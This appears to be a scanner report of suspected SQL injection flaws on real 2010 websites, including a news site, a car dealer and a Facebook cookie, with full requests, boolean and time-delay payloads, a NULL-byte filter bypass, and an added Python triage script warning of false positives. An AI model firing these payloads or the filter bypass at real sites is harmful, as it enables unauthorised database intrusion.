Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.pas ...[SNIP]...
The nclick_check parameter appears to be vulnerable to SQL injection attacks. The payloads 33516214'%20or%201%3d1--%20 and 33516214'%20or%201%3d2--%20 were each submitted in the nclick_check parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/ci_16792343?source=rss&nclick_check=133516214'%20or%201%3d1--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get prof ...[SNIP]...
Request 2
GET /news/ci_16792343?source=rss&nclick_check=133516214'%20or%201%3d2--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLo ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /samesexmarriage/ci_16792108?source=most_viewed'%20and%201%3d1--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In more than two hours of legal sparring, lawyers on both sides of the battle over the states ban on same-sex marriage were at various times pressed by each of the three 9th U.S. Circuit of Appeals judges hearing the challenge to Proposition 8.'><meta name="keywords" content="samesex marriage gay supreme court alameda contra costa county clerk"/><title>Appeals Court judges appear inclined to support gay marriage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNGiRegistrationUrl = "https://secure.www.contracostatimes.com"; MN ...[SNIP]...
Request 2
GET /samesexmarriage/ci_16792108?source=most_viewed'%20and%201%3d2--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In more than two hours of legal sparring, lawyers on both sides of the battle over the states ban on same-sex marriage were at various times pressed by each of the three 9th U.S. Circuit of Appeals judges hearing the challenge to Proposition 8.'><meta name="keywords" content="samesex marriage gay supreme court alameda contra costa county clerk"/><title>Appeals Court judges appear inclined to support gay marriage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
The campaign_click_url cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the campaign_click_url cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /logout.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; wd=450x40; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews1reports.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews1reports.com%252Fdefault-js.asp%253Fview%253D0%2526funnelid%253DF180%2526a%253Db%2526siteid%253DAPS%2526vid%253Dctt_id%253D%2526ctt_adnw%253D%2526ctt_ch%253D%2526ctt_entity%253D%2526ctt_cli%253D%2526ctt_kw%253D%2526ctt_adid%253D%2526ctt_nwtype%253D%26extra_2%3DUS'%20and%201%3d1--%20;
Response 1 (redirected)
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=e0q9u; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 08 Dec 2010 01:55:25 GMT
Content-Length: 14018
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" /> <link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z7/r/5875srnzL-I.ico" /></head> <body class="WelcomePage UIPage_LoggedOut ie7 win Locale_en_US"> <div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 --> <div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img spritemap_aanaup sx_cd927a" title="Facebook logo"></i></a><div class="rfloat"></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_Warnings"><div id="standard_status" class="UIMessageBox status"><h2 class="main_message">Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Alternativly, you can access the mobile version of Facebook <a href="http://m.facebook.com/">here</a>.</h2><p class="sub_message"></p></div></div><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap"> </div></div><div class="WelcomePage_MainSellRig ...[SNIP]...
Request 2
GET /logout.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; wd=450x40; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews1reports.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews1reports.com%252Fdefault-js.asp%253Fview%253D0%2526funnelid%253DF180%2526a%253Db%2526siteid%253DAPS%2526vid%253Dctt_id%253D%2526ctt_adnw%253D%2526ctt_ch%253D%2526ctt_entity%253D%2526ctt_cli%253D%2526ctt_kw%253D%2526ctt_adid%253D%2526ctt_nwtype%253D%26extra_2%3DUS'%20and%201%3d2--%20;
Response 2 (redirected)
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=k47Eg; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 08 Dec 2010 01:55:26 GMT
Content-Length: 14148
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" /> <link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z7/r/5875srnzL-I.ico" /></head> <body class="WelcomePage UIPage_LoggedOut ie7 win Locale_en_US"> <div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 --> <div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img sp_aanaup sx_cd927a" title="Facebook logo"></i></a><div class="rfloat"></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_Warnings"><div id="standard_status" class="UIMessageBox status"><h2 class="main_message">Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Alternativly, you can access the mobile version of Facebook <a href="http://m.facebook.com/">here</a>.</h2><p class="sub_message"></p></div></div><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap"> </div></div><div class="WelcomePage_MainSellRight"><div cl ...[SNIP]...
The confid parameter appears to be vulnerable to SQL injection attacks. The payloads 11313056'%20or%201%3d1--%20 and 11313056'%20or%201%3d2--%20 were each submitted in the confid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws are often unreliable and prone to false positives, particularly on pages whose content changes between requests (the Content-Length values in this report differ even between otherwise identical requests). The same caution applies to the error-based findings that follow: they fire when a response matches a generic error signature, and the text highlighted in several of the Response 1 excerpts below is marketing copy containing the word "exceptional" on a normal 200 OK page, which is enough to trigger a substring match on "exception" without any database error having occurred. Manually review each reported request and response, and look for a genuine database error string (or a payload whose effect is unambiguous) before treating any of these as confirmed.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the filter in front of the application is written in native code that treats strings as NUL-terminated (a web application firewall, or a native filtering module in the web server), so it stops reading at the decoded %00 while the application, which handles the full byte string, still receives the quote that follows it. You should fix the actual vulnerability within the application code (here, parameterise whichever query consumes the User-Agent value, for example for logging or analytics) and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:22:17 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:22:19 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:22:18 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 17374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <br /> Thanks to our delightful location near Fremont, our exceptional Toyota products and services are available to our friendly neighbors all around Alameda County, and furthermore, to commuters throughout Northern California. Here at Fremont Toyota, you will discov ...[SNIP]...
Request 2
GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:22:29 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:22:31 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:22:30 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 17421
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]...
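Triage for the "general error message" findings such as the one above, as an added example that is not part of the scanner or of this report. A scanner that flags any body matching a loose pattern such as "exception" fires on the word "exceptional" in the dealer's marketing copy (lifted below from a Response 1 excerpt), whereas a genuine SQL error carries a database-specific message. The signature lists, the sample error text and the verdict names are constructed for illustration.

```python
"""Triage for "general error message" scanner findings.

Added example, not the scanner's or the report's code.  The two response
excerpts are copied from this report; the database error text is constructed
(the message itself is SQL Server's own wording) and the signature lists are
illustrative, not a complete ruleset.
"""
import re

# Copied from a Response 1 body in this report (a normal 200 OK page).
RESPONSE_1_EXCERPT = (
    "Thanks to our delightful location near Fremont, our exceptional Toyota "
    "products and services are available to our friendly neighbors all around "
    "Alameda County"
)
# Copied from the matching Response 2 body (two quotes submitted).
RESPONSE_2_EXCERPT = "<TITLE>Toyota Dealer Servin"
# Constructed: what a real SQL Server error surfaced through PHP's mssql
# extension looks like when a quote has broken the string literal.
CONSTRUCTED_DB_ERROR = (
    "Warning: mssql_query(): message: Unclosed quotation mark after the "
    "character string 'Toyota'. (severity 15)"
)

# Loose patterns of the kind a generic check uses; they match ordinary prose.
GENERIC_SIGNATURES = [re.compile(p, re.I) for p in (r"exception", r"error")]

# Database-specific messages; a match here is strong evidence of a SQL error.
DB_ERROR_SIGNATURES = [re.compile(p, re.I) for p in (
    r"Unclosed quotation mark after the character string",   # SQL Server
    r"Incorrect syntax near",                                 # SQL Server
    r"You have an error in your SQL syntax",                  # MySQL
    r"\bSQLSTATE\[",                                          # PDO
    r"\bORA-\d{5}\b",                                         # Oracle
    r"mssql_query\(\)|mysql_(fetch_\w+|query)\(\)",           # PHP drivers
)]

GENERIC_ONLY = "generic-signature-only"
DB_ERROR = "database-error"
NO_ERROR = "no-error-signature"


def generic_match(body: str) -> bool:
    """True when a loose pattern matches, which includes 'exceptional'."""
    return any(sig.search(body) for sig in GENERIC_SIGNATURES)


def database_error(body: str) -> bool:
    """True only for a recognisable database error message."""
    return any(sig.search(body) for sig in DB_ERROR_SIGNATURES)


def triage(one_quote_body: str, two_quote_body: str) -> str:
    """Same comparison the scanner makes (error with one quote, gone with
    two), but on database-specific signatures; a body that only matched a
    generic pattern is sent back for manual review instead of being reported."""
    if database_error(one_quote_body) and not database_error(two_quote_body):
        return DB_ERROR
    if generic_match(one_quote_body):
        return GENERIC_ONLY
    return NO_ERROR
```

Run `triage()` on the two response bodies of any error-based finding in this report: the Toyota pages come back as generic-signature-only, which is the cue to re-test with an unambiguous payload rather than report the finding as confirmed.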
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1%00'; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:04:16 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:04:17 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:04:17 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 17447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <br /> Thanks to our delightful location near Fremont, our exceptional Toyota products and services are available to our friendly neighbors all around Alameda County, and furthermore, to commuters throughout Northern California. What you'll find at Fremont Toyota is t ...[SNIP]...
Request 2
GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1%00''; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:04:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:04:23 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:04:23 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 17557 milliseconds to respond to the request, compared with 1841 milliseconds for the original request, indicating that the injected SQL command caused a time delay. Before relying on a single timing, note that the response is the site's own 404 page and that baseline response times elsewhere in this report range from about 1.8 to 17.5 seconds, so the server is evidently slow or under load; confirm by repeating the request with two different delay values (for example 0:0:5 and 0:0:10) and checking that the difference in response time tracks the requested delay.
The database appears to be Microsoft SQL Server, inferred from the WAITFOR DELAY syntax being honoured.
Request
GET /Toyota-Dealer',0,0)waitfor%20delay'0%3a0%3a20'--/San%20Leandro/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 03:05:44 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 47928
